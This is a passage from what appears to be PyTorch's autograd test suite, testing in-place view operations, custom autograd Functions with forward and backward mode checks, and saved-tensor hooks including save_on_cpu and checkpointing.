if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertEqual(non_inplace_grad, inplace_grad)
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
class BadBw2(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
@staticmethod
def backward(ctx, foo):
return foo
@staticmethod
def vjp(ctx, foo):
return foo
class BadJvp(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
BadBw.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
BadBw2.apply(inp).sum().backward()
with self.assertRaisesRegex(RuntimeError, "must implement the jvp function"):
with fwAD.dual_level():
d = fwAD.make_dual(inp, torch.rand_like(inp))
res = BadJvp.apply(d)
def test_custom_function_forward_mode_view_checks(self):
flag_to_error = {
"ok": None,
"not_a_view": "jvp is not returning a view",
"not_a_view_of_inp": "jvp is not returning a view of the given",
"not_a_view_of_inp_base": "jvp is not returning a view of the same base",
}
class ViewFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.flag = flag
ctx.size = foo.size()
return foo.narrow(0, 0, 2)
@staticmethod
def vjp(ctx, gO):
gI = gO.new_zeros(ctx.size)
gI.narrow(0, 0, 2).copy_(gO)
return gI, None
@staticmethod
def jvp(ctx, gI, _):
res = gI.narrow(0, 0, 2)
if ctx.flag != "ok":
# Break the view in the gradients!
res = res.clone()
if ctx.flag in ["not_a_view_of_inp", "not_a_view_of_inp_base"]:
# Result should be a view, just of the wrong thing
res = res.view_as(res)
return res
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
for flag, msg in flag_to_error.items():
def test_fn(inp):
if flag == "not_a_view_of_inp_base":
inp = inp.view_as(inp)
return ViewFn.apply(inp, flag)
if msg is None:
gradcheck(test_fn, inp, check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, msg):
gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
class InplaceFn(Function):
@staticmethod
def forward(ctx, foo, flag):
ctx.mark_dirty(foo)
ctx.flag = flag
foo.mul_(2)
return foo
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.flag:
# Don't do the change inplace
return 2 * gI
else:
gI.mul_(2)
return gI
inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
def test_fn(inp, flag):
inp = inp.clone()
return InplaceFn.apply(inp, flag)
gradcheck(test_fn, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
class UserFn(Function):
@staticmethod
def forward(ctx, foo, should_fail):
ctx.should_fail = should_fail
return foo * 2
@staticmethod
def vjp(ctx, gO):
return 2 * gO, None
@staticmethod
def jvp(ctx, gI, _):
if ctx.should_fail:
# Wrong gradient formula
return 3 * gI
else:
return 2 * gI
inp = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)
with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_non_tensor_before_tensor_args(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, nt, x, nt2, y):
return x * 2 + y * 3
@staticmethod
def jvp(ctx, nt, x_t, nt2, y_t):
self.assertIsNone(nt)
self.assertIsNone(nt2)
return x_t * 2 + y_t * 3
x = torch.tensor(1., dtype=torch.double)
t = torch.tensor(1., dtype=torch.double)
y = torch.tensor(1., dtype=torch.double)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, t)
MyFn.apply(1, dual_x, 1, y)
gradcheck(MyFn.apply, (1, x.requires_grad_(True), 1, y.requires_grad_(True)), check_forward_ad=True,
check_backward_ad=False, check_batched_grad=False)
def test_custom_function_forward_mode_forward_is_no_op(self):
error_regex = "A custom Function's forward is returning a view \\(or an input as-is\\)"
return_lambdas = {
# If we return an input as-is in forward, that is treated
# as if self.view_as(self) is performed. If jvp returns x.view_as(x),
# this is OK.
"view_as": lambda x: x.view_as(x),
# Expect this to raise an error
"self": lambda x: x,
# Expect this to raise the same error
"mul_by_2": lambda x: x * 2,
}
for k, fn in return_lambdas.items():
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
return x + y, x
@staticmethod
def vjp(ctx, gO1, gO2):
return gO1 + gO2, gO1
@staticmethod
def jvp(ctx, x_t, y_t):
return x_t + y_t, fn(x_t)
a = torch.tensor(1., dtype=torch.double, requires_grad=True)
t = torch.tensor(1., dtype=torch.double)
b = torch.tensor(1., dtype=torch.double, requires_grad=True)
c = torch.tensor(1., dtype=torch.double)
t2 = torch.tensor(1., dtype=torch.double)
d = torch.tensor(1., dtype=torch.double)
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
c_dual = fwAD.make_dual(c, t2)
if k == "view_as":
_, out2 = MyFn.apply(a_dual, b)
self.assertTrue(fwAD.unpack_dual(out2).tangent._base is t)
_, out2 = MyFn.apply(c_dual, d)
self.assertTrue(fwAD.unpack_dual(out2).tangent._base is t2)
else:
with self.assertRaisesRegex(RuntimeError, error_regex):
MyFn.apply(a_dual, b)
with self.assertRaisesRegex(RuntimeError, error_regex):
MyFn.apply(c_dual, d)
if k == "view_as":
gradcheck(MyFn.apply, (a, c), check_forward_ad=True)
else:
with self.assertRaisesRegex(RuntimeError, error_regex):
gradcheck(MyFn.apply, (a, c), check_forward_ad=True)
def test_custom_function_save_for_forward(self):
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x: torch.Tensor, y: torch.Tensor, z: int):
ctx.save_for_backward(x, y)
ctx.save_for_forward(x, y)
ctx.z = z
ctx.prod = x * y
return z * ctx.prod
@staticmethod
def jvp(ctx, x_t, y_t, _):
x_p, y_p = ctx.saved_tensors
z = ctx.z
return z * (y_p * x_t + x_p * y_t)
@staticmethod
def vjp(ctx, grad_out):
x, y = ctx.saved_tensors
z = ctx.z
return z * grad_out * y, z * grad_out * x, None
a = torch.tensor(1., requires_grad=True, dtype=torch.double)
t = torch.tensor(1., dtype=torch.double)
b = torch.tensor(2., requires_grad=True, dtype=torch.double)
c = 4
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
out = Func.apply(a_dual, b, c)
out.backward()
gradcheck(Func.apply, (a, b, c), check_forward_ad=True)
# When saved for backward, but not saved for forward
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x: torch.Tensor):
ctx.save_for_backward(x)
return x.clone()
@staticmethod
def jvp(ctx, x_t):
self.assertEqual(len(ctx.saved_tensors), 0)
return x_t
@staticmethod
def vjp(ctx, grad_out):
x, = ctx.saved_tensors
self.assertEqual(len(ctx.saved_tensors), 1)
return grad_out
with fwAD.dual_level():
a_dual = fwAD.make_dual(a, t)
out = Func.apply(a_dual)
out.backward()
gradcheck(Func.apply, (a,), check_forward_ad=True)
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
def test(get_input, is_leaf):
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
self.assertEqual(a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(2 * a, a.grad)
a = get_input()
grad_fn = a.grad_fn
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
self.assertEqual(2 * a, y.grad_fn._saved_self)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
y.sum().backward()
else:
y.sum().backward()
self.assertEqual(3 * a, a.grad)
# double backward
a = get_input()
grad_fn = a.grad_fn
y = a ** 3
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
if not is_leaf:
self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
g.sum().backward()
else:
g.sum().backward()
self.assertEqual(6 * a, a.grad)
a = get_input()
y = a * a
y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
print(y.grad_fn._saved_self)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
a = get_input()
y = a * a
with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
def inplace_double(x):
x *= 2
return x
a = get_input()
t = a * a
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
# leaf
test(lambda: torch.randn(5, requires_grad=True), True)
# not leaf, not output
test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
# Tests that default hooks are properly registered, used and reset
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
# See also:
# - test_saved_variable_packing_unpacking_saved_original_with_hooks
def pack(x):
warnings.warn("pack")
return x
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
a = torch.ones(5, requires_grad=True)
warnings.simplefilter('always')
with warnings.catch_warnings(record=True) as w:
y = a * a
# should raise two warnings from a being saved twice
self.assertEqual(len(w), 2)
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(2 * a, y.grad_fn._saved_self)
self.assertEqual(2 * a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(4 * a, a.grad)
# Exited hooks correctly
a = torch.randn(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_not_fail(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
pass
def test_setting_default_saved_variable_hooks_twice_should_use_inner(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: 3 * x, lambda x: 3 * x):
b = torch.randn(5, requires_grad=True)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 5 * x, lambda x: 5 * x):
a = torch.randn(5, requires_grad=True)
y = a * a
z = b * b
y.sum().backward()
z.sum().backward()
self.assertEqual(2 * 5 * 5 * a, a.grad)
self.assertEqual(2 * 3 * 3 * b, b.grad)
def test_save_on_cpu_and_checkpoint(self):
a = torch.randn(2, 2, requires_grad=True)
b = a.pow(2).pow(2).pow(2).pow(2)
b.sum().backward()
b_grad = a.grad.clone()
a.grad.zero_()
with torch.autograd.graph.save_on_cpu():
h = a.pow(2)
h = checkpoint(lambda x: x.pow(2).pow(2), h, use_reentrant=False)
c = h.pow(2)
c.sum().backward()
c_grad = a.grad.clone()
a.grad.zero_()
def f(a):
h = a.pow(2)
with torch.autograd.graph.save_on_cpu():
h = h.pow(2).pow(2)
return h.pow(2)
d = checkpoint(f, a, use_reentrant=False)
d.sum().backward()
d_grad = a.grad.clone()
self.assertEqual(b_grad, c_grad)
self.assertEqual(b_grad, d_grad)
def test_pack_hook_with_inplace_modification_should_fail(self):
a = torch.randn(5, requires_grad=True)
def inc(x):
x += 1
return x
with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y = torch.exp(a)
y = torch.exp(a)
with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
with tempfile.TemporaryDirectory() as tmp_dir:
def pack(x):
name = os.path.join(tmp_dir, str(uuid.uuid4()))
torch.save(x, name)
return name
def unpack(name):
return torch.load(name)
with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
a = torch.ones(5, requires_grad=True)
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
y.sum().backward()
self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
self.assertEqual(6 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 2 because only a is saved once
self.assertEqual(6 * 2 * a, a.grad)
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
# so grad is saved and self (i.e. a) is saved
self.assertEqual(6 * 4 * a, a.grad)
with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = a ** 3
s = torch.sum(y)
g, = torch.autograd.grad(s, (a, ), create_graph=True)
g.sum().backward()
# combining the two above blocks: 2 * 4 = 8
# note that in that sense, a is saved twice
self.assertEqual(6 * 8 * a, a.grad)
def test_graph_save_on_cpu(self):
def test(get_input, cuda, pin_memory):
with torch.autograd.graph.save_on_cpu(pin_memory):
a = get_input()
if cuda:
a.cuda()
y = a * a
self.assertEqual(a, y.grad_fn._saved_self)
self.assertEqual(a, y.grad_fn._saved_other)
self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
if y.is_sparse:
y = y.to_dense()
y.sum().backward()
self.assertEqual(2 * a, a.grad)
for cuda in [False] + ([True] if torch.cuda.is_available() else []):
for pin_memory in [True, False]:
# FloatTensor
test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
# DoubleTensor
test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
# Sparse tensor
x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
test(lambda: x, cuda, pin_memory)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_graph_save_on_cpu_cuda(self):
def f(x):
a = x + 1
return a * a
# with grad
a = torch.ones(1, requires_grad=True, device="cuda")
